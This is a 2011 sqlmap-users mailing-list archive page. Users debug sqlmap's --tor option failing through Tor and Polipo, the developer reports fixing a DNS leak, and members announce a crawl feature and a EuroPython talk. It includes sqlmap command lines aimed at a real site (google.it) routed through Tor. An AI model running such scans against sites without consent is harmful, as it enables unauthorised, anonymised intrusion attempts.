[CRITICAL] unable to connect to the target url or proxy, >>>> sqlmap is going to retry the request >>>> [16:57:53] [CRITICAL] unable to connect to the target url or proxy, >>>> sqlmap is going to retry the request >>>> [16:57:54] [CRITICAL] unable to connect to the target url or proxy >>>> >>>> What bothers me is that Tor and Polipo are running fine with other >>>> applications, or at least they seems to. >>>> I have tried to force with --proxy to localhost:8118 or localhost:9050 >>>> but still can't connect. >>>> >>>> G. >>>> >>>> >>>> On Fri, Jun 24, 2011 at 3:10 PM, Anthony Boynes <ab...@gm...> wrote: >>>>> I haven't had any problems with the -tor switch; as of "sqlmap/1.0-dev >>>>> (r4170)". Not sure if its something which was fixed already. You >>>>> should >>>>> provide some version information in future bug posts. >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> All the data continuously generated in your IT infrastructure contains a >>>>> definitive record of customers, application performance, security >>>>> threats, fraudulent activity and more. Splunk takes this data and makes >>>>> sense of it. Business sense. IT sense. Common sense.. >>>>> http://p.sf.net/sfu/splunk-d2d-c1 >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> All the data continuously generated in your IT infrastructure contains a >>>> definitive record of customers, application performance, security >>>> threats, fraudulent activity and more. Splunk takes this data and makes >>>> sense of it. Business sense. IT sense. Common sense.. >>>> http://p.sf.net/sfu/splunk-d2d-c1 >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar (@stamparm) >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> >> ------------------------------------------------------------------------------ >> All the data continuously generated in your IT infrastructure contains a >> definitive record of customers, application performance, security >> threats, fraudulent activity and more. Splunk takes this data and makes >> sense of it. Business sense. IT sense. Common sense.. >> http://p.sf.net/sfu/splunk-d2d-c1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 18:27:07
|
hi all. just a minor status report about this whole mess i've caused. it seems that i was "plumbing" DNS leakage while the real cause was in front of my eyes. so, with the last commit r4177 there shouldn't be any DNS leakages (removed the original cause), together with broken --proxy/--tor (caused by my plumbing) like in some reported cases find the attached screenshots of Wireshark's run with original DNS leakage (before.jpg) and with the latest commit (after.jpg). sorry, my fault. kr -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 17:25:02
|
hi again. this should be hopefully fixed now for ever and ever. kr On Fri, Jun 24, 2011 at 5:14 PM, Miroslav Stampar <mir...@gm...> wrote: > Hi all. > > Relying from a train. > > There is a known reported issue related to the recent dns leakage fix and > --tor/--proxy. Will need to reproduce to be able to fix it. > > Kr > > Sent from smartphone > > On 24.6.2011. 17:06, "Gianluca Brindisi" <g...@br...> wrote: >> Mmm, I should be in r4168. >> But before the tests I have casted --update >> >> Anyway I've just checked out r4173 but still no luck: >> >> ./sqlmap.py --tor -u "http://www.google.it" >> >> sqlmap/1.0-dev (r4173) - automatic SQL injection and database takeover >> tool >> http://sqlmap.sourceforge.net >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility >> to obey all applicable local, state and federal laws. Authors assume >> no liability and are not responsible for any misuse or damage caused >> by this program >> >> [*] starting at 16:57:50 >> >> [16:57:50] [WARNING] increasing default value for --time-sec to 10 >> because --tor switch was provided >> [16:57:50] [INFO] setting Tor proxy settings >> [16:57:51] [INFO] using '/*****/sqlmap/output/www.google.it/session' >> as session file >> [16:57:51] [INFO] testing connection to the target url >> [16:57:51] [CRITICAL] unable to connect to the target url or proxy, >> sqlmap is going to retry the request >> [16:57:51] [WARNING] if the problem persists please check that the >> provided target url is valid. If it is, you can try to rerun with the >> --random-agent switch turned on and/or proxy switches (--ignore-proxy, >> --proxy,...) >> [16:57:52] [CRITICAL] unable to connect to the target url or proxy, >> sqlmap is going to retry the request >> [16:57:53] [CRITICAL] unable to connect to the target url or proxy, >> sqlmap is going to retry the request >> [16:57:54] [CRITICAL] unable to connect to the target url or proxy >> >> What bothers me is that Tor and Polipo are running fine with other >> applications, or at least they seems to. >> I have tried to force with --proxy to localhost:8118 or localhost:9050 >> but still can't connect. >> >> G. >> >> >> On Fri, Jun 24, 2011 at 3:10 PM, Anthony Boynes <ab...@gm...> wrote: >>> I haven't had any problems with the -tor switch; as of "sqlmap/1.0-dev >>> (r4170)". Not sure if its something which was fixed already. You >>> should >>> provide some version information in future bug posts. >>> >>> >>> ------------------------------------------------------------------------------ >>> All the data continuously generated in your IT infrastructure contains a >>> definitive record of customers, application performance, security >>> threats, fraudulent activity and more. Splunk takes this data and makes >>> sense of it. Business sense. IT sense. Common sense.. >>> http://p.sf.net/sfu/splunk-d2d-c1 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> ------------------------------------------------------------------------------ >> All the data continuously generated in your IT infrastructure contains a >> definitive record of customers, application performance, security >> threats, fraudulent activity and more. Splunk takes this data and makes >> sense of it. Business sense. IT sense. Common sense.. >> http://p.sf.net/sfu/splunk-d2d-c1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 15:14:17
|
Hi all. Relying from a train. There is a known reported issue related to the recent dns leakage fix and --tor/--proxy. Will need to reproduce to be able to fix it. Kr Sent from smartphone On 24.6.2011. 17:06, "Gianluca Brindisi" <g...@br...> wrote: > Mmm, I should be in r4168. > But before the tests I have casted --update > > Anyway I've just checked out r4173 but still no luck: > > ./sqlmap.py --tor -u "http://www.google.it" > > sqlmap/1.0-dev (r4173) - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 16:57:50 > > [16:57:50] [WARNING] increasing default value for --time-sec to 10 > because --tor switch was provided > [16:57:50] [INFO] setting Tor proxy settings > [16:57:51] [INFO] using '/*****/sqlmap/output/www.google.it/session' > as session file > [16:57:51] [INFO] testing connection to the target url > [16:57:51] [CRITICAL] unable to connect to the target url or proxy, > sqlmap is going to retry the request > [16:57:51] [WARNING] if the problem persists please check that the > provided target url is valid. If it is, you can try to rerun with the > --random-agent switch turned on and/or proxy switches (--ignore-proxy, > --proxy,...) > [16:57:52] [CRITICAL] unable to connect to the target url or proxy, > sqlmap is going to retry the request > [16:57:53] [CRITICAL] unable to connect to the target url or proxy, > sqlmap is going to retry the request > [16:57:54] [CRITICAL] unable to connect to the target url or proxy > > What bothers me is that Tor and Polipo are running fine with other > applications, or at least they seems to. > I have tried to force with --proxy to localhost:8118 or localhost:9050 > but still can't connect. > > G. > > > On Fri, Jun 24, 2011 at 3:10 PM, Anthony Boynes <ab...@gm...> wrote: >> I haven't had any problems with the -tor switch; as of "sqlmap/1.0-dev >> (r4170)". Not sure if its something which was fixed already. You should >> provide some version information in future bug posts. >> >> ------------------------------------------------------------------------------ >> All the data continuously generated in your IT infrastructure contains a >> definitive record of customers, application performance, security >> threats, fraudulent activity and more. Splunk takes this data and makes >> sense of it. Business sense. IT sense. Common sense.. >> http://p.sf.net/sfu/splunk-d2d-c1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > ------------------------------------------------------------------------------ > All the data continuously generated in your IT infrastructure contains a > definitive record of customers, application performance, security > threats, fraudulent activity and more. Splunk takes this data and makes > sense of it. Business sense. IT sense. Common sense.. > http://p.sf.net/sfu/splunk-d2d-c1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Gianluca B. <g...@br...> - 2011-06-24 15:06:14
|
Mmm, I should be in r4168. But before the tests I have casted --update Anyway I've just checked out r4173 but still no luck: ./sqlmap.py --tor -u "http://www.google.it" sqlmap/1.0-dev (r4173) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 16:57:50 [16:57:50] [WARNING] increasing default value for --time-sec to 10 because --tor switch was provided [16:57:50] [INFO] setting Tor proxy settings [16:57:51] [INFO] using '/*****/sqlmap/output/www.google.it/session' as session file [16:57:51] [INFO] testing connection to the target url [16:57:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [16:57:51] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the --random-agent switch turned on and/or proxy switches (--ignore-proxy, --proxy,...) [16:57:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [16:57:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [16:57:54] [CRITICAL] unable to connect to the target url or proxy What bothers me is that Tor and Polipo are running fine with other applications, or at least they seems to. I have tried to force with --proxy to localhost:8118 or localhost:9050 but still can't connect. G. On Fri, Jun 24, 2011 at 3:10 PM, Anthony Boynes <ab...@gm...> wrote: > I haven't had any problems with the -tor switch; as of "sqlmap/1.0-dev > (r4170)". Not sure if its something which was fixed already. You should > provide some version information in future bug posts. > > ------------------------------------------------------------------------------ > All the data continuously generated in your IT infrastructure contains a > definitive record of customers, application performance, security > threats, fraudulent activity and more. Splunk takes this data and makes > sense of it. Business sense. IT sense. Common sense.. > http://p.sf.net/sfu/splunk-d2d-c1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Anthony B. <ab...@gm...> - 2011-06-24 13:10:54
|
I haven't had any problems with the -tor switch; as of "sqlmap/1.0-dev (r4170)". Not sure if its something which was fixed already. You should provide some version information in future bug posts. |
|
From: Gianluca B. <g...@br...> - 2011-06-24 11:30:09
|
Hello everybody, I am having a hard time using tor with the latest sqlmap-dev (just updated). It seems it can't connect to the polipo proxy (and it worked flawlessy in 0.9) even if default ports are correct. I am pretty sure tor and polipo are well configured on my box since I use them with other applications. The error output is this: [13:07:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [13:07:57] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the --random-agent switch turned on and/or proxy switches (--ignore-proxy, --proxy,...) [13:07:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [13:07:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [13:08:00] [CRITICAL] unable to connect to the target url or proxy I'd like to debug it by myself but I need some assistance on where should I look at. Any help is appreciated! Thank you, Gianluca |
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 05:39:13
|
hi all. minor update. --crawl is no more a boolean switch. now as a parameter it takes depth value (e.g. --crawl=2). done by request from Anthony Boynes. kr On Mon, Jun 20, 2011 at 11:33 PM, Miroslav Stampar <mir...@gm...> wrote: > p.s.: > > there were few really nasty bugs involved. now it should be pretty stable > > kr > > On Mon, Jun 20, 2011 at 1:43 PM, Miroslav Stampar > <mir...@gm...> wrote: >> Hi all. >> >> With the last commit you'll find --crawl (multithreaded) switch implemented. >> >> Example of usage: >> python sqlmap.py -u www.site.com --crawl >> >> It's a basic HTML scrapping crawler based on BeautifulSoup module. >> >> KR >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Kurt G. <gr...@ji...> - 2011-06-22 17:51:30
|
There's a reason why our grandparents used to dip their fingers in the whiskey glass when our parents were teething. Alcohol calms all. -- Kurt Grutzmacher -=- gr...@ji... On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar < mir...@gm...> wrote: > it seems that i'll need to drink 2 beers before > > if you see me "probably" drunk you'll know i am :) > > kr > > On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> wrote: > > /me gonna record it and spread it all of the interwebs :D > > > > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> ok people. > >> > >> this is my first conference and i am not the best narrator there is in > >> the universe. > >> > >> i'll kill myself if it will be "streamed" :) > >> > >> kr > >> > >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > >> <chr...@gm...> wrote: > >> > If it is, be sure to point us in the right direction afterwards :) > >> > > >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > >> >> > >> >> will it be streamed live ? > >> >> > >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> >> <ber...@gm...> wrote: > >> >>> > >> >>> Hi, > >> >>> > >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython > >> >>> 2011 conference in Firenze, Italy. > >> >>> > >> >>> The talk is titled "sqlmap - security development in python". > >> >>> > >> >>> Abstract follows: > >> >>> """ > >> >>> The "sqlmap" is one of the largest, widely used and most active > Python > >> >>> projects in the IT security community (more than 2000 commits in one > >> >>> year period with community of over 100 active testers). It combines > >> >>> its developers' strong security knowledge together with analytical, > >> >>> mathematical and Python development skills to provide IT > professionals > >> >>> with vibrant features. > >> >>> > >> >>> Talk would be consisted of several parts: short introduction to > >> >>> project and developers, developing and testing environment, > >> >>> programming cycle, program's workflow, technologies used, common > >> >>> pitfalls and how we've circumvent them, usage of mathematical > models, > >> >>> optimizations, project's future goals. > >> >>> > >> >>> The significant part of this talk would be the immediate insight > into > >> >>> the developing process of probably the world's most advanced > >> >>> open-source Python IT security project today. > >> >>> """ > >> >>> > >> >>> Reference: > >> >>> > >> >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >> >>> > >> >>> Don't miss it if you are there, it will be a blast! :) > >> >>> > >> >>> Good luck Miroslav, > >> >>> Bernardo > >> >>> > >> >>> > >> >>> -- > >> >>> Bernardo Damele A. G. > >> >>> > >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >> >>> Mobile: +447788962949 (UK 07788962949) > >> >>> PGP Key ID: Unavailable > >> >>> > >> >>> > >> >>> > >> >>> > ------------------------------------------------------------------------------ > >> >>> Simplify data backup and recovery for your virtual environment with > >> >>> vRanger. > >> >>> Installation's a snap, and flexible recovery options mean your data > is > >> >>> safe, > >> >>> secure and there when you need it. Data protection magic? > >> >>> Nope - It's vRanger. Get your free trial download today. > >> >>> http://p.sf.net/sfu/quest-sfdev2dev > >> >>> _______________________________________________ > >> >>> sqlmap-users mailing list > >> >>> sql...@li... > >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > >> >> > >> >> > >> >> -- > >> >> > >> >> Ahmed Shawky El-Antry > >> >> Pen-tester, Programmer and System administrator > >> >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> Isecur1ty team member"http://www.isecur1ty.org" > >> >> Twitter @lnxg33k > >> >> > >> >> > >> >> > >> >> > ------------------------------------------------------------------------------ > >> >> Simplify data backup and recovery for your virtual environment with > >> >> vRanger. > >> >> Installation's a snap, and flexible recovery options mean your data > is > >> >> safe, > >> >> secure and there when you need it. Data protection magic? > >> >> Nope - It's vRanger. Get your free trial download today. > >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> _______________________________________________ > >> >> sqlmap-users mailing list > >> >> sql...@li... > >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > >> > > >> > > >> > > >> > > ------------------------------------------------------------------------------ > >> > Simplify data backup and recovery for your virtual environment with > >> > vRanger. > >> > Installation's a snap, and flexible recovery options mean your data is > >> > safe, > >> > secure and there when you need it. Data protection magic? > >> > Nope - It's vRanger. Get your free trial download today. > >> > http://p.sf.net/sfu/quest-sfdev2dev > >> > _______________________________________________ > >> > sqlmap-users mailing list > >> > sql...@li... > >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > > >> > > >> > >> > >> > >> -- > >> Miroslav Stampar (@stamparm) > >> > >> E-mail: miroslav.stampar (at) gmail.com > >> PGP Key ID: 0xB5397B1B > > > > > > > > -- > > > > Ahmed Shawky El-Antry > > Pen-tester, Programmer and System administrator > > lnxg33k owner "http://lnxg33k.wordpress.com" > > Isecur1ty team member"http://www.isecur1ty.org" > > Twitter @lnxg33k > > > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with > vRanger. > Installation's a snap, and flexible recovery options mean your data is > safe, > secure and there when you need it. Data protection magic? > Nope - It's vRanger. Get your free trial download today. > http://p.sf.net/sfu/quest-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Miroslav S. <mir...@gm...> - 2011-06-22 16:18:45
|
it seems that i'll need to drink 2 beers before if you see me "probably" drunk you'll know i am :) kr On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> wrote: > /me gonna record it and spread it all of the interwebs :D > > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > <mir...@gm...> wrote: >> >> ok people. >> >> this is my first conference and i am not the best narrator there is in >> the universe. >> >> i'll kill myself if it will be "streamed" :) >> >> kr >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley >> <chr...@gm...> wrote: >> > If it is, be sure to point us in the right direction afterwards :) >> > >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: >> >> >> >> will it be streamed live ? >> >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. >> >> <ber...@gm...> wrote: >> >>> >> >>> Hi, >> >>> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython >> >>> 2011 conference in Firenze, Italy. >> >>> >> >>> The talk is titled "sqlmap - security development in python". >> >>> >> >>> Abstract follows: >> >>> """ >> >>> The "sqlmap" is one of the largest, widely used and most active Python >> >>> projects in the IT security community (more than 2000 commits in one >> >>> year period with community of over 100 active testers). It combines >> >>> its developers' strong security knowledge together with analytical, >> >>> mathematical and Python development skills to provide IT professionals >> >>> with vibrant features. >> >>> >> >>> Talk would be consisted of several parts: short introduction to >> >>> project and developers, developing and testing environment, >> >>> programming cycle, program's workflow, technologies used, common >> >>> pitfalls and how we've circumvent them, usage of mathematical models, >> >>> optimizations, project's future goals. >> >>> >> >>> The significant part of this talk would be the immediate insight into >> >>> the developing process of probably the world's most advanced >> >>> open-source Python IT security project today. >> >>> """ >> >>> >> >>> Reference: >> >>> >> >>> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python. >> >>> >> >>> Don't miss it if you are there, it will be a blast! :) >> >>> >> >>> Good luck Miroslav, >> >>> Bernardo >> >>> >> >>> >> >>> -- >> >>> Bernardo Damele A. G. >> >>> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >> >>> Mobile: +447788962949 (UK 07788962949) >> >>> PGP Key ID: Unavailable >> >>> >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >> >>> Simplify data backup and recovery for your virtual environment with >> >>> vRanger. >> >>> Installation's a snap, and flexible recovery options mean your data is >> >>> safe, >> >>> secure and there when you need it. Data protection magic? >> >>> Nope - It's vRanger. Get your free trial download today. >> >>> http://p.sf.net/sfu/quest-sfdev2dev >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> >> >> >> -- >> >> >> >> Ahmed Shawky El-Antry >> >> Pen-tester, Programmer and System administrator >> >> lnxg33k owner "http://lnxg33k.wordpress.com" >> >> Isecur1ty team member"http://www.isecur1ty.org" >> >> Twitter @lnxg33k >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> Simplify data backup and recovery for your virtual environment with >> >> vRanger. >> >> Installation's a snap, and flexible recovery options mean your data is >> >> safe, >> >> secure and there when you need it. Data protection magic? >> >> Nope - It's vRanger. Get your free trial download today. >> >> http://p.sf.net/sfu/quest-sfdev2dev >> >> _______________________________________________ >> >> sqlmap-users mailing list >> >> sql...@li... >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> > >> > >> > >> > ------------------------------------------------------------------------------ >> > Simplify data backup and recovery for your virtual environment with >> > vRanger. >> > Installation's a snap, and flexible recovery options mean your data is >> > safe, >> > secure and there when you need it. Data protection magic? >> > Nope - It's vRanger. Get your free trial download today. >> > http://p.sf.net/sfu/quest-sfdev2dev >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> > >> >> >> >> -- >> Miroslav Stampar (@stamparm) >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B > > > > -- > > Ahmed Shawky El-Antry > Pen-tester, Programmer and System administrator > lnxg33k owner "http://lnxg33k.wordpress.com" > Isecur1ty team member"http://www.isecur1ty.org" > Twitter @lnxg33k > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Ahmed S. <ah...@is...> - 2011-06-22 16:16:26
|
/me gonna record it and spread it all of the interwebs :D On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar < mir...@gm...> wrote: > ok people. > > this is my first conference and i am not the best narrator there is in > the universe. > > i'll kill myself if it will be "streamed" :) > > kr > > On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > <chr...@gm...> wrote: > > If it is, be sure to point us in the right direction afterwards :) > > > > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > >> > >> will it be streamed live ? > >> > >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> <ber...@gm...> wrote: > >>> > >>> Hi, > >>> > >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython > >>> 2011 conference in Firenze, Italy. > >>> > >>> The talk is titled "sqlmap - security development in python". > >>> > >>> Abstract follows: > >>> """ > >>> The "sqlmap" is one of the largest, widely used and most active Python > >>> projects in the IT security community (more than 2000 commits in one > >>> year period with community of over 100 active testers). It combines > >>> its developers' strong security knowledge together with analytical, > >>> mathematical and Python development skills to provide IT professionals > >>> with vibrant features. > >>> > >>> Talk would be consisted of several parts: short introduction to > >>> project and developers, developing and testing environment, > >>> programming cycle, program's workflow, technologies used, common > >>> pitfalls and how we've circumvent them, usage of mathematical models, > >>> optimizations, project's future goals. > >>> > >>> The significant part of this talk would be the immediate insight into > >>> the developing process of probably the world's most advanced > >>> open-source Python IT security project today. > >>> """ > >>> > >>> Reference: > >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >>> > >>> Don't miss it if you are there, it will be a blast! :) > >>> > >>> Good luck Miroslav, > >>> Bernardo > >>> > >>> > >>> -- > >>> Bernardo Damele A. G. > >>> > >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >>> Mobile: +447788962949 (UK 07788962949) > >>> PGP Key ID: Unavailable > >>> > >>> > >>> > ------------------------------------------------------------------------------ > >>> Simplify data backup and recovery for your virtual environment with > >>> vRanger. > >>> Installation's a snap, and flexible recovery options mean your data is > >>> safe, > >>> secure and there when you need it. Data protection magic? > >>> Nope - It's vRanger. Get your free trial download today. > >>> http://p.sf.net/sfu/quest-sfdev2dev > >>> _______________________________________________ > >>> sqlmap-users mailing list > >>> sql...@li... > >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > >> > >> > >> -- > >> > >> Ahmed Shawky El-Antry > >> Pen-tester, Programmer and System administrator > >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> Isecur1ty team member"http://www.isecur1ty.org" > >> Twitter @lnxg33k > >> > >> > >> > ------------------------------------------------------------------------------ > >> Simplify data backup and recovery for your virtual environment with > >> vRanger. > >> Installation's a snap, and flexible recovery options mean your data is > >> safe, > >> secure and there when you need it. Data protection magic? > >> Nope - It's vRanger. Get your free trial download today. > >> http://p.sf.net/sfu/quest-sfdev2dev > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > > > > > > > ------------------------------------------------------------------------------ > > Simplify data backup and recovery for your virtual environment with > vRanger. > > Installation's a snap, and flexible recovery options mean your data is > safe, > > secure and there when you need it. Data protection magic? > > Nope - It's vRanger. Get your free trial download today. > > http://p.sf.net/sfu/quest-sfdev2dev > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- - Ahmed Shawky El-Antry - Pen-tester, Programmer and System administrator - lnxg33k owner "http://lnxg33k.wordpress.com" - Isecur1ty team member"http://www.isecur1ty.org" - Twitter @lnxg33k |
|
From: Miroslav S. <mir...@gm...> - 2011-06-22 16:15:33
|
ok people. this is my first conference and i am not the best narrator there is in the universe. i'll kill myself if it will be "streamed" :) kr On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley <chr...@gm...> wrote: > If it is, be sure to point us in the right direction afterwards :) > > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: >> >> will it be streamed live ? >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. >> <ber...@gm...> wrote: >>> >>> Hi, >>> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython >>> 2011 conference in Firenze, Italy. >>> >>> The talk is titled "sqlmap - security development in python". >>> >>> Abstract follows: >>> """ >>> The "sqlmap" is one of the largest, widely used and most active Python >>> projects in the IT security community (more than 2000 commits in one >>> year period with community of over 100 active testers). It combines >>> its developers' strong security knowledge together with analytical, >>> mathematical and Python development skills to provide IT professionals >>> with vibrant features. >>> >>> Talk would be consisted of several parts: short introduction to >>> project and developers, developing and testing environment, >>> programming cycle, program's workflow, technologies used, common >>> pitfalls and how we've circumvent them, usage of mathematical models, >>> optimizations, project's future goals. >>> >>> The significant part of this talk would be the immediate insight into >>> the developing process of probably the world's most advanced >>> open-source Python IT security project today. >>> """ >>> >>> Reference: >>> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python. >>> >>> Don't miss it if you are there, it will be a blast! :) >>> >>> Good luck Miroslav, >>> Bernardo >>> >>> >>> -- >>> Bernardo Damele A. G. >>> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >>> Mobile: +447788962949 (UK 07788962949) >>> PGP Key ID: Unavailable >>> >>> >>> ------------------------------------------------------------------------------ >>> Simplify data backup and recovery for your virtual environment with >>> vRanger. >>> Installation's a snap, and flexible recovery options mean your data is >>> safe, >>> secure and there when you need it. Data protection magic? >>> Nope - It's vRanger. Get your free trial download today. >>> http://p.sf.net/sfu/quest-sfdev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> -- >> >> Ahmed Shawky El-Antry >> Pen-tester, Programmer and System administrator >> lnxg33k owner "http://lnxg33k.wordpress.com" >> Isecur1ty team member"http://www.isecur1ty.org" >> Twitter @lnxg33k >> >> >> ------------------------------------------------------------------------------ >> Simplify data backup and recovery for your virtual environment with >> vRanger. >> Installation's a snap, and flexible recovery options mean your data is >> safe, >> secure and there when you need it. Data protection magic? >> Nope - It's vRanger. Get your free trial download today. >> http://p.sf.net/sfu/quest-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with vRanger. > Installation's a snap, and flexible recovery options mean your data is safe, > secure and there when you need it. Data protection magic? > Nope - It's vRanger. Get your free trial download today. > http://p.sf.net/sfu/quest-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Chris O. <chr...@gm...> - 2011-06-22 16:13:25
|
